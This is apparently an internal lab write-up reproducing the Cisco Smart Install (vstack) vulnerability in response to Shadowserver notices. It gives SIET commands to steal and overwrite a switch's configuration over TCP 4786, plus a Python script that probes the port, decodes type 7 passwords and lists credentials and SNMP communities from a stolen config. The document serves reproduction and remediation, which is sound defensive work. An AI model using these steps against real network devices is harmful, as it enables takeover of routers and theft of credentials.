

SIET Cisco smart install vulnerability

  • Cisco Smart Install (vstack) compromise affecting the hosts listed in the Shadowserver notification. The technique is written up here:
  • 2016.zeronights.ru/wp-content/uploads/2016/12/CiscoSmartInstall.v3.pdf

  • The Dmitry Kuznetsov attack works against any switch or router running the Smart Install client (vstack) in its default, enabled state. A Smart Install client accepts unauthenticated instructions from a "director" device, including an instruction to load or save its configuration via a TFTP server that the director names; the attacker simply poses as the director. The protocol runs over TCP port 4786.
  • Shadowserver sends ISPs a feed of affected institutions: some external-facing routers, some internal routers or switches. Incident #1615253 and others were created Wed Dec 06 and titled 'potentially vulnerable Cisco devices in your network'.

Steps to reproduce

Server

  • Set up a tftp-server on vili.
  • Edit /etc/xinetd.d/tftp so the server allows new files to be created: server_args = -c -p -s -v /tftpboot

  • n.b. without -c the tftp server refuses to create new files, so the switch cannot upload its config and the retrieval fails.
  • Open tftp (UDP port 69) in firewall-cmd.
  • Set up a second interface on the private 192.168.0.0/24 network, with vili as 192.168.0.1.
  • Run git clone https://github.com/Sab0tag3d/SIET

Switch

  • Power up a Cisco switch (Catalyst 3560) running IOS 12.2 or later.
  • Connect a console cable from the switch to a USB port on vili.
  • Connect vili interface #2 to a switch port.
  • From the server, run sudo screen /dev/ttyUSB0 9600 to open a terminal session to the switch.
  • Give the switch's VLAN 1 interface a private class C address, e.g. 192.168.0.2
  • Check that vstack (Smart Install) is running: show vstack config should report the Client role with SmartInstall enabled.
  • One extra edit was made: ip tftp source-interface FastEthernet0/1

  • (This last step should not be necessary: vstack is enabled by default on a new switch.)

Exploit

  • STEAL config: from the git directory run sudo python siet.py -g -i 192.168.0.2

  • This retrieves the switch config into ~/SIET/tftp/192.168.0.2.conf
  • OVERWRITE config: run sudo python siet.py -c -i 192.168.0.2 then press d for default. Set a username/password and the time before reload.
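What the retrieved file hands an attacker, and how to triage a host from the Shadowserver list, as an added example: this is not part of the procedure above and not SIET's own code. It probes TCP 4786, the Smart Install port named above, and audits an IOS config of the kind siet.py -g writes: it reports whether the client was disabled with no vstack, decodes reversible type 7 passwords using the fixed, publicly known IOS key, and lists SNMP communities. The sample config is constructed for the example; its hostname, users, hash and communities are invented.

```python
import re
import socket

# Fixed XOR key used by IOS "password 7" obfuscation; it is the same on every device.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

# Constructed sample in the shape siet.py -g writes to ~/SIET/tftp/<ip>.conf.
# Hostname, users, the type 5 hash and the communities are invented for this example.
SAMPLE_CONFIG = """\
hostname sw-lab
enable secret 5 $1$abcd$constructedHashPlaceholder0000
enable password 7 0822455D0A16
username admin privilege 15 password 7 1501580F16793F
username backup password 0 Letmein1
snmp-server community public RO
snmp-server community private RW
interface Vlan1
 ip address 192.168.0.2 255.255.255.0
ip tftp source-interface FastEthernet0/1
end
"""

CRED_RE = re.compile(
    r"^(?:enable|username (\S+)(?: privilege \d+)?) (secret|password)(?: (\d))? (\S+)$"
)
SNMP_RE = re.compile(r"^snmp-server community (\S+)(?: (RO|RW))?")


def decode_type7(encoded):
    """Reverse a type 7 string: the first two decimal digits give the key
    offset, the rest is hex, each byte XORed with the key byte at offset+i."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string: %r" % encoded)
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(body)).decode()


def audit_config(text):
    """Pull out what matters from a stolen IOS running-config."""
    result = {
        "smart_install_disabled": False,  # True only if 'no vstack' is present
        "plaintext_credentials": [],      # (account, password) the attacker now holds
        "hashed_credentials": [],         # (account, type, hash) needing offline cracking
        "communities": [],                # (community, mode); RO is the IOS default
    }
    for raw in text.splitlines():
        line = raw.strip()
        if line == "no vstack":
            result["smart_install_disabled"] = True
            continue
        m = CRED_RE.match(line)
        if m:
            account = m.group(1) or "enable"
            ptype, value = m.group(3), m.group(4)
            if ptype == "7":
                result["plaintext_credentials"].append((account, decode_type7(value)))
            elif ptype in (None, "0"):
                result["plaintext_credentials"].append((account, value))
            else:  # types 5, 8 and 9 are salted hashes, not reversible
                result["hashed_credentials"].append((account, ptype, value))
            continue
        m = SNMP_RE.match(line)
        if m:
            result["communities"].append((m.group(1), m.group(2) or "RO"))
    return result


def smart_install_port_open(host, port=4786, timeout=3.0):
    """Quick triage of a host from the Shadowserver feed: does anything answer
    on the Smart Install port? Open does not by itself prove exploitable, but
    an Internet-facing listener is what the feed is reporting."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    findings = audit_config(SAMPLE_CONFIG)
    print("Smart Install disabled:", findings["smart_install_disabled"])
    for account, pw in findings["plaintext_credentials"]:
        print("plaintext credential:", account, pw)
    for account, ptype, h in findings["hashed_credentials"]:
        print("hashed credential (type %s): %s" % (ptype, account))
    for community, mode in findings["communities"]:
        print("SNMP community:", community, mode)
```

Run it against a real ~/SIET/tftp/<ip>.conf by reading the file into audit_config; every account it lists under plaintext_credentials, plus every SNMP community, should be treated as compromised and rotated, and a config with no "no vstack" line is still exposed after the incident is closed.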